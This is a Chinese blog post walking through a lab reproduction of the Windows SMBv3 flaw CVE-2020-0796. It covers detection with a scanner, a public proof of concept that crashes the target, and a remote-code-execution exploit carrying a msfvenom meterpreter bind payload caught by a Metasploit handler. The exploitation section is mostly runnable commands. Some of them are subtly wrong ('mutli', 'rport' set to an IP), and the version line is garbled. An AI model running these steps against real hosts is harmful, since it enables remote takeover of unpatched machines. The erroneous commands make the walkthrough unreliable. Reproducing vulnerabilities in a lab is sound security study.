CVE-2020-0796漏洞复现

一、漏洞介绍

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

二、漏洞影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
只影响 SMB v3.1.119031909

三、漏洞复现

(1)实验环境

靶机:win10   192.168.3.138
攻击机:kali  192.168.3.128
记得关闭防火墙!

(2)检测漏洞

使用cve-2020-0796漏洞检测工具进行检测
检测当前win10操作系统是否存在漏洞
奇安信检测脚本:
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
使用cmd 运行 检测程序
输入靶机的地址(也可以是ip范围)
进行检测、
靶机存在cve-2020-0796漏洞
image.png

(3)漏洞利用

靶机蓝屏

在攻击机kali中下载蓝屏exp

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git

下载完成后 进入exp目录
image.png
使用命令 将setup.py安装

python3 setup.py install

安装完成后
使用CVE-2020-0796.py 进行攻击

python3 CVE-2020-0796.py 192.168.3.138

成功蓝屏
image.png

反弹shell

使用msf生成payload

msfvenom -p windows/x64/meterpreter/bind_tcp lport=8888 -f py -o 1111.py

生成文件名为1111.py

下载远程RCE执行exp
地址:https://github.com/chompie1337/SMBGhost_RCE_PoC
将生成的1111.py中的内容复制
替换掉 exploit.py文件中的USER_PAYLOAD参数
并将buf参数替换为USER_PAYLOAD
image.png

之后将整个exp文件夹复制到kali中
image.png

启动msf
设置payload lport rhost参数的值

msf
use exploit/mutli/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rport 192.168.3.138  //win10的IP地址
run

msf监听8888端口

另起一个会话
运行exploit.py 脚本

python3 exploit.py -ip 192.168.3.138

image.png
msf监听到会话
image.png
复现成功

四、参考文章

https://blog.csdn.net/weixin_42742658/article/details/120564824

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值